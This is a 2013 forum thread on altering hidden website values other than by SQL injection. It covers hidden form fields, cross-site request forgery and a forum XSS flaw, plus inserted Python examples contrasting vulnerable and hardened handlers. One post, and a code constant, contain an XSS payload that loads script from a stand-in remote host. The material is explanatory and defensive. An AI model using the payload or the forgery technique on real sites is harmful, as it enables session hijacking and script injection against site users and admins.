Changing values besides SQL Injection

Started by frosty, December 27, 2013, 03:35:24 AM


frosty

I know that SQL Injection is a good way to hack into a server and change what you want, steal what you want, or even crash the database, but I remember reading a thread on Mozilla forums where the posters agreed in conclusion that there are other methods, besides SQL injection, by which you can change certain values hidden from the average users. Considering, they said, that certain values such as post count, join date, etc. are simply accepted number values in a system, with the right methods the user could change such values to their liking.

Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection? Because that would mean that hacking in some cases is not required for someone to change certain hidden values they want changed. And would it even be legal to do so anyways? Editing the source code only changes things on your end for a short time.

Plu

It all depends on how the website is set up. If your server accepts a form that includes the post count, which is a 'hidden' field, and you rely on the user to properly update it, then he can simply post a different value and change it like that. It's perfectly legal to do so, and dumb on the side of the programmer to use that approach.

It's also possible to use cross-site hacks that post a form as another user by hijacking their user session. That's not legal, but if a site is vulnerable to it and you get such a script to run on the machine of an admin, you could change just about anything because the server will interpret the requests as coming from the admin.

Of course both of these can be blocked off with good software design.

EDIT: and of course there are many more options, depending on the setup of the site. But all of them rely on the programmer making a mistake somewhere.
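As an added example (not code from this thread or any forum software), here is a profile-update handler of the kind Plu describes: the first version trusts a 'hidden' post_count field and accepts any cross-site submission, the second ignores the field, recomputes the count from server-side data, and requires a per-session CSRF token. The user names, counts and form field names are constructed for the demonstration.

```python
import hmac
import secrets

# Constructed server-side state: the posts the server actually stored.
POSTS_BY_USER = {"frosty": 12, "plu": 340}
PROFILES = {"frosty": {"post_count": 12}, "plu": {"post_count": 340}}


def update_profile_vulnerable(session, form):
    """Trusts every submitted field, including the 'hidden' post_count."""
    user = session["user"]
    PROFILES[user]["post_count"] = int(form["post_count"])
    return PROFILES[user]["post_count"]


def issue_csrf_token(session):
    """Bind a random token to the session; the real form echoes it back."""
    session["csrf"] = secrets.token_hex(16)
    return session["csrf"]


def update_profile_hardened(session, form):
    """Rejects requests without the session token and never reads post_count."""
    user = session["user"]
    expected = session.get("csrf")
    supplied = form.get("csrf", "")
    # Constant-time compare avoids leaking the token via timing differences.
    if not expected or not hmac.compare_digest(expected, supplied):
        raise PermissionError("missing or invalid CSRF token")
    # The hidden field is ignored; the count is derived from server data.
    PROFILES[user]["post_count"] = POSTS_BY_USER[user]
    return PROFILES[user]["post_count"]


def submit_without_token(session):
    """What a form posted from another site would get: a rejection string."""
    try:
        update_profile_hardened(session, {"post_count": "99999"})
    except PermissionError as exc:
        return str(exc)
    return "accepted"
```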

bericks999

Take a look at the Metasploit tool to learn exactly what you are asking about. It's an open source penetration testing framework, therefore entirely free to download and use.

http://www.metasploit.com/
... I swear, one day religion is going to physically poison me to death.

Sal1981

Unescape, unescape, unescape.

Data sanitation is very important in online forms, especially forum posts.

For instance, on RuneScape's official forums there was an oversight of the quote button, where you could hide JavaScript as regular text by just typing: ',0); followed by any inline tag. Even something like ',0);<script src='remotesite/malicious_code.js'></script> would load whatever was in the remote js in the browser's client. What really annoyed me in this particular case is that JaGeX took a whole 2 weeks to patch this, even though loads of people knew about it on the HLF section of the forums. I even saw throw-away accounts post tiny font-sized text with this text, with links to external script files hidden among regular text, hoping people would click on the quote button. It is patched now, at last.
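As an added example of the quote-button oversight the post describes (not Sal1981's or the forum's code), a quote renderer that splices the quoted text straight into the page markup, beside one that HTML-escapes every user-controlled value. The injected string is the one quoted in the post; the markup layout is constructed.

```python
import html

# The string from the post above, constructed here as sample input.
INJECTED = "',0);<script src='remotesite/malicious_code.js'></script>"


def render_quote_vulnerable(author, body):
    """Splices user text directly into HTML: any tag in it becomes live."""
    return f"<blockquote><cite>{author}</cite>{body}</blockquote>"


def render_quote_escaped(author, body):
    """Escapes <, >, &, quotes before the text reaches the markup."""
    return (
        f"<blockquote><cite>{html.escape(author, quote=True)}</cite>"
        f"{html.escape(body, quote=True)}</blockquote>"
    )


def contains_script_tag(markup):
    """Detection helper: does the rendered output still carry a script tag?"""
    return "<script" in markup.lower()
```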

Jason78

Quote from: "frosty": Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

Yes. Yes there is. It's still compromising a computer system though, and still technically illegal.
Winner of WitchSabrina's Best Advice Award 2012


We can easily forgive a child who is afraid of the dark; the real
tragedy of life is when men are afraid of the light. -Plato

bericks999

Quote from: "Jason78":
    Quote from: "frosty": Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

    Yes. Yes there is. It's still compromising a computer system though, and still technically illegal.
That's not true as I've legally compromised many systems as part of a penetration testing team.

Plu

I also doubt the defense "but they're not allowed" will hold if your machine openly accepts any value for a variable.

aitm

If anybody wants some practice hacking I have a site that I would pay a couple hundred to get hacked/fucked up/destroyed etc.......PM me.
A human's desire to live is exceeded only by their willingness to die for another. Even god cannot equal this magnificent sacrifice. No god has the right to judge them. -first tenet of the Panotheust

Jason78

Quote from: "bericks999":
    Quote from: "Jason78":
        Quote from: "frosty": Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

        Yes. Yes there is. It's still compromising a computer system though, and still technically illegal.
    That's not true as I've legally compromised many systems as part of a penetration testing team.

Yeah, but I'm guessing that Frosty doesn't own the site he's thinking of hacking.

frosty

Quote from: "aitm": If anybody wants some practice hacking I have a site that I would pay a couple hundred to get hacked/fucked up/destroyed etc.......PM me.

I remember a guy that did that for fun, he was so skilled at this type of stuff it was amazing. But unfortunately he was as elusive as he was good at hacking, and he disappeared as far as I'm concerned. He probably would have been the best person for that type of job.

Quote from: "Jason78": Yeah, but I'm guessing that Frosty doesn't own the site he's thinking of hacking.

Oh wow, Jason, I was just curious. I did not want to make an account on Mozilla forums, so I thought I would ask here.